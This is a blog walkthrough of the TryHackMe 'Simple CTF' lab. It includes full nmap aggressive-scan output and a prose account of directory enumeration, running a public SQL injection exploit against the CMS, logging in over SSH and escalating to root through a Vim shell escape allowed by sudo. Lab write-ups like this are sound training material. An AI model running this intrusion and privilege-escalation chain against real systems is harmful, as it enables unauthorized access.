Well it all begins with a new CTF . This time Simple CTF by MrSeth6797. Kudos to this guy for creating this challenge!

Follow along with me and join the room - https://tryhackme.com/room/easyctf!


Nmap Aggressive Scan!

First thing I did was to run an nmap scan!  I decided to run an nmap aggressive scan in order to get all possible details regarding the ports which are up and running!

Nmap 7.70 scan initiated Mon Aug 19 23:44:41 2019 as: nmap -sC -sV -T4 -A -o nmapAgressive 10.10.123.218
Nmap scan report for 10.10.123.218 (10.10.123.218)
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.2.42
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|
/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|
256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%), Linux 2.6.32 - 3.1 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 203.19 ms 10.8.0.1 (10.8.0.1)
2 202.75 ms 10.10.123.218 (10.10.123.218)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Mon Aug 19 23:45:36 2019 -- 1 IP address (1 host up) scanned in 56.13 seconds

I found port 80 (HTTP), 21 (FTP), 2222 (SSH).

We can see that port 21 is open and allows anonymous FTP login. On trying to access the FTP it does not shows anything!

Well this turned to be a rabbit-hole!

On opening the default IP in the browser we are provided with the default Apache page!

From here, we need to run dirb/gobuster and or Nikto to find the available directories and/or issues.

The Gobuster revealed some directories. On checking the default robots.txt file we are presented with another directory!

On trying opening this directory it seems to be a rabbit-hole!

While there is one more directory! named simple! on trying to access this we are provided with the CMS!

Doing a quick google search, I came across multiple CVEs. One being a SQL Injection!

This CVE included the exploitation code, so I simply saved this code and ran it against the URL. The usage of the script is as above!

Once ran i was prompted with the username and password!

After this, I knew that the SSH service opened and we can now connect to SSH in order to enumerate and get our flags.

On checking the directory I came across the user flag!

I enumerated the machine further to find places where I could potentially escalate my privileges! After some investigation, it looks like this user can run Vim as root!

So we can run the VIM and can escalate out privileges by spawning the shell (!:bash inside Vim)

Well, we are root now!

I hope that you will be able to find the root flag!

Happy Hunting!